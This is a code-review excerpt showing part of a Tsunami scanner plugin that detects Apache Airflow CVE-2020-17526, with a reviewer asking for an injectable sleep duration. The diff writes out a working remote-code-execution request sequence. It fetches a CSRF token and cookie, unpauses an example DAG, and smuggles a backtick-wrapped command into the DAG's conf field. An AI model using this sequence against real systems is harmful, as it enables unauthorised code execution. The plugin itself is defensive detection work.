community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526Detector.java

```diff
@@ -0,0 +1,250 @@
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    var payload = getTsunamiCallbackHttpPayload();
+    if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) {
+      logger.atWarning().log(
+          "Tsunami callback server is not setup for this environment, cannot run CVE-2020-17526"
+              + " Detector.");
+      return false;
+    }
+
+    String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+    try {
+      // 1. sending the first request to retrieve a valid CSRF token and a valid cookie
+      Map<String, String> results = getFreshCsrfTokenAndSessionCookie(networkService);
+      if (results == null) {
+        return false;
+      }
+      String freshSessionCookieValue = results.get("freshSessionCookieValue");
+      String freshCsrfToken = results.get("freshCsrfToken");
+
+      // 2. enabling the vulnerable DAG
+      this.httpClient.send(
+          HttpRequest.post(
+                  rootUrl + "admin/airflow/paused?is_paused=true&dag_id=example_trigger_target_dag")
+              .setHeaders(
+                  HttpHeaders.builder()
+                      .addHeader("Cookie", String.format("session=%s", freshSessionCookieValue))
+                      .addHeader("X-CSRFToken", freshCsrfToken)
+                      .build())
+              .build(),
+          networkService);
+
+      // 3. sending the RCE payload
+      results = getFreshCsrfTokenAndSessionCookie(networkService);
+      if (results == null) {
+        return false;
+      }
+
+      freshSessionCookieValue = results.get("freshSessionCookieValue");
+      freshCsrfToken = results.get("freshCsrfToken");
+
+      String urlEncodedBody =
+          "csrf_token=CSRFTOKEN&dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag&conf=%7B%22message%22%3A%22%60PAYLOAD%60%22%7D"
+              .replace("CSRFTOKEN", freshCsrfToken);
+      urlEncodedBody =
+          urlEncodedBody.replace("PAYLOAD", URLEncoder.encode(payload.getPayload(), UTF_8));
+
+      this.httpClient.send(
+          HttpRequest.post(
+                  rootUrl
+                      + "admin/airflow/trigger?dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag")
+              .setHeaders(
+                  HttpHeaders.builder()
+                      .addHeader("Cookie", String.format("session=%s", freshSessionCookieValue))
+                      .addHeader("X-CSRFToken", freshCsrfToken)
+                      .addHeader("Content-Type", "application/x-www-form-urlencoded")
+                      .build())
+              .setRequestBody(ByteString.copyFromUtf8(urlEncodedBody))
+              .build(),
+          networkService);
+
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(25));
```

Comment:
Could you make the time here injected via guice? So that the unit test can inject a different value to make the test run faster.